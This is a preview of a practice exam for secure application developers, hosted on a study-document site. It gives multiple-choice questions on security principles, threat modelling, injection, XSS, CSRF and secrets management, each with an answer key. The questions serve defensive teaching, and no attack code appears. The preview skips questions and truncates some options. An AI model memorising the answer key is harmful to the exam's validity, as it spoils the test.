










































































Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
A practice exam for secure application developers, covering key concepts such as the cia triad, least privilege, fail securely, stride, privacy by design, and more. It includes questions and detailed explanations to help developers understand and apply security principles in their work. The exam covers topics like threat modeling, secure microservices architecture, data encryption, sast, sql injection prevention, xss, secure password storage, csrf tokens, and defense in depth. It also addresses iac, security gates in ci/cd pipelines, secret management, wafs, penetration testing, environment segregation, and security misconfigurations.
Typology: Exams
1 / 82
This page cannot be seen from the preview
Don't miss anything!











































































Question 1. What is the primary goal of the CIA triad in information security? A) Ensuring data is encrypted at all times B) Protecting Confidentiality, Integrity, and Availability of data C) Preventing all types of cyber attacks D) Managing user privileges effectively Answer: B) Protecting Confidentiality, Integrity, and Availability of data Explanation: The CIA triad emphasizes the core objectives in security: ensuring data remains confidential, unaltered, and accessible when needed. Question 2. Which security principle advocates for assigning the minimum permissions necessary for a component or user? A) Defense in Depth B) Least Privilege C) Complete Mediation D) Separation of Duties Answer: B) Least Privilege Explanation: Least Privilege minimizes access rights to reduce the attack surface, giving users only what they need to perform their tasks. Question 3. What does "Fail Securely" mean in security design principles? A) The system always shuts down upon failure B) The system defaults to a secure, restricted state when failures occur C) Failures are ignored to maintain availability D) Failures are logged but do not impact security Answer: B) The system defaults to a secure, restricted state when failures occur
Explanation: Fail Securely ensures that in case of failure, the system doesn't expose vulnerabilities, maintaining a secure posture. Question 4. Which model is used to systematically identify threats by categorizing potential security issues? A) DREAD B) STRIDE C) PASTA D) CMMI Answer: B) STRIDE Explanation: STRIDE categorizes threats as Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. Question 5. Which of the following is a key aspect of Privacy by Design (PbD)? A) Encrypting all data at rest only B) Incorporating privacy considerations from the start of development C) Implementing strict access controls after deployment D) Removing personal data from the system Answer: B) Incorporating privacy considerations from the start of development Explanation: PbD emphasizes embedding privacy measures during the design phase, ensuring data minimization and purpose specification. Question 6. In threat modeling, what is the purpose of Data Flow Diagrams (DFD)? A) To visualize system architecture B) To map data movement and identify trust boundaries C) To document user requirements
D) Fuzzing APIs for unexpected behavior Answer: B) Analyzing source code without executing it for vulnerabilities Explanation: SAST examines source code statically to identify security flaws early in development. Question 10. Which of the following is an effective way to prevent SQL injection attacks? A) Using stored procedures and parameterized queries B) Disabling database logging C) Avoiding input validation D) Using plain string concatenation in queries Answer: A) Using stored procedures and parameterized queries Explanation: Parameterized queries prevent malicious input from altering SQL commands, mitigating injection risks. Question 11. How does Cross-Site Scripting (XSS) typically occur? A) When user input is stored unescaped in output and executed as code B) When SQL queries are improperly sanitized C) When session tokens are stolen D) When insecure cookies are used Answer: A) When user input is stored unescaped in output and executed as code Explanation: XSS exploits unescaped user input being rendered as executable code in browsers, allowing malicious scripts to run. Question 12. Which of the following is a recommended practice for secure password storage? A) Storing passwords in plain text B) Using slow hashing algorithms like bcrypt or Argon2 with salts C) Encrypting passwords with symmetric encryption
D) Hashing passwords with MD Answer: B) Using slow hashing algorithms like bcrypt or Argon2 with salts Explanation: Slow, salted hashes protect against brute-force attacks and ensure password security. Question 13. What is the purpose of implementing Cross-Site Request Forgery (CSRF) tokens? A) To authenticate users B) To prevent unauthorized commands transmitted from authenticated users C) To encrypt user data D) To prevent SQL injection Answer: B) To prevent unauthorized commands transmitted from authenticated users Explanation: CSRF tokens verify that requests originate from legitimate sources, preventing malicious cross-site requests. Question 14. Which security principle involves validating every access attempt to resources? A) Least Privilege B) Complete Mediation C) Defense in Depth D) Separation of Duties Answer: B) Complete Mediation Explanation: Complete Mediation requires that all access attempts are checked against security policies, preventing bypasses. Question 15. Which technique helps detect vulnerabilities early by analyzing source code before deployment? A) Penetration testing B) Dynamic analysis
B) Storing secrets in environment variables C) Using secret management tools like HashiCorp Vault D) Using plain text files on servers Answer: C) Using secret management tools like HashiCorp Vault Explanation: Secret management tools provide secure storage, access controls, and auditing for sensitive credentials. Question 19. What is the main purpose of a Web Application Firewall (WAF)? A) To block all incoming traffic B) To filter, monitor, and block malicious HTTP traffic C) To encrypt data in transit D) To replace secure coding practices Answer: B) To filter, monitor, and block malicious HTTP traffic Explanation: WAFs protect web applications from common attacks like SQL injection, XSS, and other OWASP top vulnerabilities. Question 20. Which testing method involves simulating a malicious attacker to evaluate security controls? A) Static testing B) Manual code review C) Penetration testing D) Fuzzing Answer: C) Penetration testing Explanation: Penetration testing actively attempts to exploit vulnerabilities to assess security posture. Question 21. Why is environment segregation important in secure software development?
A) To increase development speed B) To prevent test data from affecting production systems C) To enable sharing of resources D) To reduce costs Answer: B) To prevent test data from affecting production systems Explanation: Segregation ensures that testing activities do not impact live environments, maintaining security and integrity. Question 22. What does "Security Misconfiguration" typically involve? A) Using default passwords and open ports B) Properly securing all resources C) Implementing least privilege D) Encrypting all data Answer: A) Using default passwords and open ports Explanation: Misconfigurations like default credentials and unnecessary open services expose systems to attacks. Question 23. Which principle emphasizes having multiple layers of security to protect assets? A) Least Privilege B) Defense in Depth C) Complete Mediation D) Separation of Duties Answer: B) Defense in Depth Explanation: Defense in Depth involves multiple security controls so that if one layer fails, others remain protective.
Question 27. Which is an example of a data protection mechanism at rest? A) TLS encryption B) Disk encryption or database encryption C) Input validation D) Session tokens Answer: B) Disk encryption or database encryption Explanation: Data at rest protection involves encrypting stored data to prevent unauthorized access. Question 28. Why should test environments avoid using production data? A) To save storage space B) To prevent exposure of sensitive information C) To speed up testing D) To simplify setup Answer: B) To prevent exposure of sensitive information Explanation: Using sanitized or synthetic data reduces risk of data leaks during testing. Question 29. Which vulnerability involves unauthorized access to objects or resources by manipulating identifiers? A) Injection B) Cross-Site Scripting C) Insecure Direct Object Reference (IDOR) D) Buffer Overflow Answer: C) Insecure Direct Object Reference (IDOR) Explanation: IDOR occurs when an attacker manipulates resource identifiers to access unauthorized data.
Question 30. What is a key benefit of using multi-factor authentication (MFA)? A) It simplifies login processes B) It adds an extra layer of security beyond passwords C) It replaces the need for passwords D) It reduces server load Answer: B) It adds an extra layer of security beyond passwords Explanation: MFA requires multiple verification factors, significantly reducing the risk of unauthorized access. Question 31. Which is a common OWASP Top 10 vulnerability related to improper session management? A) Injection B) Broken Authentication and Session Management C) Cross-Site Scripting D) Security Misconfiguration Answer: B) Broken Authentication and Session Management Explanation: Poor session handling can lead to session hijacking and impersonation attacks. Question 32. What is the purpose of "complete mediation" in secure design? A) To cache access control decisions B) To validate every access attempt to resources C) To allow temporary access D) To bypass security checks for performance Answer: B) To validate every access attempt to resources Explanation: Complete Mediation ensures that each access is checked against security policies, preventing circumvention.
Question 36. Which type of testing involves analyzing dependencies for known vulnerabilities? A) Static analysis B) Software Composition Analysis (SCA) C) Penetration testing D) Fuzz testing Answer: B) Software Composition Analysis (SCA) Explanation: SCA tools identify vulnerabilities in third-party libraries and dependencies. Question 37. How does "defense in depth" improve security? A) By reducing costs B) By layering multiple security controls to protect assets C) By simplifying security architecture D) By relying solely on firewalls Answer: B) By layering multiple security controls to protect assets Explanation: Multiple overlapping controls mitigate the failure of any single security measure. Question 38. Which security best practice involves checking every resource access attempt? A) Least Privilege B) Complete Mediation C) Defense in Depth D) Separation of Duties Answer: B) Complete Mediation Explanation: Complete Mediation ensures continuous validation of access requests. Question 39. Why are secrets management tools essential in DevSecOps?
A) To facilitate user onboarding B) To securely store and control access to sensitive data like API keys C) To replace encryption D) To automate code reviews Answer: B) To securely store and control access to sensitive data like API keys Explanation: Secrets management tools prevent exposure of credentials and enforce access policies. Question 40. What is a common security misconfiguration that can lead to vulnerabilities? A) Enabling default passwords B) Applying patches timely C) Using secure protocols D) Disabling unnecessary services Answer: A) Enabling default passwords Explanation: Default passwords are well-known and can be exploited if not changed. Question 41. Which security testing approach analyzes the application’s source code for vulnerabilities before execution? A) Fuzz testing B) Static Application Security Testing (SAST) C) Penetration testing D) Runtime monitoring Answer: B) Static Application Security Testing (SAST) Explanation: SAST examines source code statically to find security flaws early. Question 42. What is the main purpose of a Content Security Policy (CSP)?
A) Data encryption with TLS B) Data masking C) Data anonymization D) Data backups Answer: A) Data encryption with TLS Explanation: TLS encrypts data during transit, preventing interception and eavesdropping. Question 46. Which vulnerability is addressed by implementing proper input validation? A) SQL injection B) Buffer overflow C) Cross-Site Scripting (XSS) D) All of the above Answer: D) All of the above Explanation: Proper input validation helps prevent multiple vulnerabilities, including injection and scripting attacks. Question 47. What is the purpose of a penetration test? A) To analyze source code B) To simulate attacks and identify vulnerabilities C) To scan networks for open ports D) To validate security policies Answer: B) To simulate attacks and identify vulnerabilities Explanation: Penetration tests actively exploit vulnerabilities to assess security defenses. Question 48. Why is environment segregation crucial for secure software development?
A) To improve development speed B) To prevent testing activities from affecting production data and systems C) To reduce infrastructure costs D) To facilitate collaboration Answer: B) To prevent testing activities from affecting production data and systems Explanation: Segregation maintains data privacy and system integrity by isolating environments. Question 49. Which practice helps ensure that applications are resilient to security misconfigurations? A) Regular security audits and configuration reviews B) Ignoring default settings C) Disabling security features D) Using the same configuration across all environments Answer: A) Regular security audits and configuration reviews Explanation: Regular audits identify misconfigurations before they can be exploited. Question 50. Which of the following is a best practice for managing application secrets? A) Hardcoding secrets in source code B) Using environment variables without access controls C) Using dedicated secret management tools with access policies D) Storing secrets in version control Answer: C) Using dedicated secret management tools with access policies Explanation: Secret management tools provide secure storage, access control, and auditing. Question 51. How does a WAF help in securing web applications? A) By encrypting all data
C) By ignoring errors D) By allowing all access during failures Answer: B) By defaulting to a secure state during failures Explanation: Ensuring that failures do not expose vulnerabilities maintains security even when errors occur. Question 55. Which security principle involves requiring multiple individuals to complete high-risk tasks? A) Least Privilege B) Separation of Duties (SoD) C) Defense in Depth D) Complete Mediation Answer: B) Separation of Duties (SoD) Explanation: SoD reduces risk by distributing responsibilities among multiple parties. Question 56. Which security measure is most effective in preventing session hijacking? A) Using secure, random, and time-limited session tokens B) Disabling cookies C) Storing sessions in local storage D) Using HTTP instead of HTTPS Answer: A) Using secure, random, and time-limited session tokens Explanation: Proper session tokens prevent attackers from hijacking authenticated sessions. Question 57. What is the purpose of input sanitization? A) To encrypt data B) To prevent malicious input from causing harm
C) To improve performance D) To store data securely Answer: B) To prevent malicious input from causing harm Explanation: Sanitization removes or escapes malicious input that could lead to vulnerabilities like injection. Question 58. Which security testing method involves analyzing application behavior during actual use? A) Static analysis B) Fuzzing C) Manual testing D) Dynamic testing Answer: D) Dynamic testing Explanation: Dynamic testing observes application behavior at runtime to identify vulnerabilities. Question 59. Why is it important to implement proper access control on every resource? A) To simplify development B) To prevent unauthorized access and privilege escalation C) To improve performance D) To comply with GDPR Answer: B) To prevent unauthorized access and privilege escalation Explanation: Proper access controls ensure users can only access resources they're authorized for. Question 60. Which of the following best describes "least privilege"? A) Giving users full access to all systems B) Assigning only the permissions necessary for tasks